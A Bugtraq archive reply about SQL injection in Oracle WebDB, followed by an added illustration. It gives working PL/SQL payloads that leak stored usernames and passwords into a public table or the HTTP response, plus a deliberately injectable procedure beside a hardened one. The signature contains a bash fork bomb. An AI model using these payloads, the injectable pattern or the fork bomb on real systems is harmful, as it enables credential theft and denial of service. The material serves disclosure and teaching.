Bugtraq mailing list archives
Re: Oracle WebDb engine brain-damagse
From: Michal Zalewski <lcamtuf () DIONE IDS PL>
Date: Fri, 22 Dec 2000 02:10:44 +0100
On Wed, 20 Dec 2000, McAllister, Andrew wrote:
> This is not to say that you can't issue some dangerous commands as you suggest, just that you won't see any data as a result. Also, I believe that only data manipulation commands will work in this context e.g. delete, update, insert. I don't believe definition commands will work, e.g. drop, create. Again I don't have WebDB, so I cannot verify.
I believe you can do at least one of these possibilities:

- SELECT <pattern> INTO <sth> FROM <table> to move sensitive data from some private table to publicly available tables used e.g. for direct contents rendering,
- call WebDB output procedures to produce output (you can use full PL/SQL language syntax, including loops, declarations etc.).
> I don't know this product well enough to say the above query will work, but I know of a similar, non-oracle, product that behaves exactly as Michal Zalewski describes. That product vendor was notified moments ago of Michal Zalewski's discovery /.../
Any hints?:)

--
_______________________________________________________
Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =--=>
Did you know that clones never use mirrors? <=--=
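As an added illustration, not part of the original thread or of any WebDB code, the two possibilities Zalewski lists are written out below as the kind of anonymous PL/SQL block an attacker would want executed in a "blind" injection where no result set ever comes back. The tables PRIVATE_ACCOUNTS and PUBLIC_NEWS, their columns, and the SHOW_NEWS_BAD / SHOW_NEWS_OK procedures are hypothetical; HTP.P is the real OWA output procedure that PL/SQL gateways such as WebDB use to write into the HTTP response buffer.

```sql
-- Hypothetical schema (assumption): a table the web user must not read,
-- and a table whose rows the application renders to anyone.
CREATE TABLE private_accounts (username VARCHAR2(30), password VARCHAR2(30));
CREATE TABLE public_news (title VARCHAR2(200), body VARCHAR2(4000));

-- Constructed sample rows so the blocks below have something to move.
INSERT INTO private_accounts VALUES ('alice', 'hunter2');
INSERT INTO private_accounts VALUES ('bob',   'letmein');
COMMIT;

-- (1) Data movement: a DML-only context is enough. Nothing is returned to
-- the attacker, but the rows now sit in a table the application renders.
BEGIN
  INSERT INTO public_news (title, body)
    SELECT 'leak', username || ':' || password FROM private_accounts;
  COMMIT;
END;
/

-- The same leak using SELECT ... INTO inside a loop, as the post phrases it,
-- to show that full PL/SQL (declarations, cursors, loops) is available.
DECLARE
  v_line VARCHAR2(4000);
BEGIN
  FOR r IN (SELECT username FROM private_accounts) LOOP
    SELECT username || ':' || password INTO v_line
      FROM private_accounts WHERE username = r.username;
    INSERT INTO public_news (title, body) VALUES ('leak', v_line);
  END LOOP;
  COMMIT;
END;
/

-- (2) Direct output: HTP.P appends to the gateway's page buffer, so query
-- results can be rendered straight into the HTTP response.
BEGIN
  FOR r IN (SELECT username, password FROM private_accounts) LOOP
    htp.p(r.username || ':' || r.password || '<br>');
  END LOOP;
END;
/

-- Why a request parameter can carry a whole block (hypothetical vulnerable
-- form): the parameter is spliced into source text that is then parsed.
CREATE OR REPLACE PROCEDURE show_news_bad (p_title IN VARCHAR2) AS
BEGIN
  EXECUTE IMMEDIATE
    'BEGIN FOR r IN (SELECT body FROM public_news WHERE title = ''' ||
    p_title || ''') LOOP htp.p(r.body); END LOOP; END;';
END;
/

-- Hardened form: the parameter is bound, never parsed, so it can only ever
-- be compared as a title value.
CREATE OR REPLACE PROCEDURE show_news_ok (p_title IN VARCHAR2) AS
BEGIN
  FOR r IN (SELECT body FROM public_news WHERE title = p_title) LOOP
    htp.p(r.body);
  END LOOP;
END;
/
```

To check block (1), query PUBLIC_NEWS afterwards as the low-privilege web user: the leaked rows are there even though the injected statement printed nothing. Block (2) only produces visible output when run inside a gateway request; in a plain SQL*Plus session the HTP buffer can be dumped with SET SERVEROUTPUT ON followed by EXEC owa_util.showpage. Note that both leaks need only INSERT and SELECT privileges plus the ability to run a PL/SQL block, which is exactly the "DML only" context the quoted message treats as harmless.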
Current thread:
- Oracle WebDb engine brain-damagse Michal Zalewski (Dec 20)
- <Possible follow-ups>
- Re: Oracle WebDb engine brain-damagse Michal Zalewski (Dec 20)
- Re: Oracle WebDb engine brain-damagse McAllister, Andrew (Dec 20)
- Re: Oracle WebDb engine brain-damagse Michal Zalewski (Dec 22)
- Re: Oracle WebDb engine brain-damagse sporty o'one (Dec 22)
- Re: Oracle WebDb engine brain-damagse Michal Zalewski (Dec 22)
- Re: Oracle WebDb engine brain-damagse Michal Zalewski (Dec 22)
- Re: Oracle WebDb engine brain-damagse Kuznetsov, Vasily (Dec 21)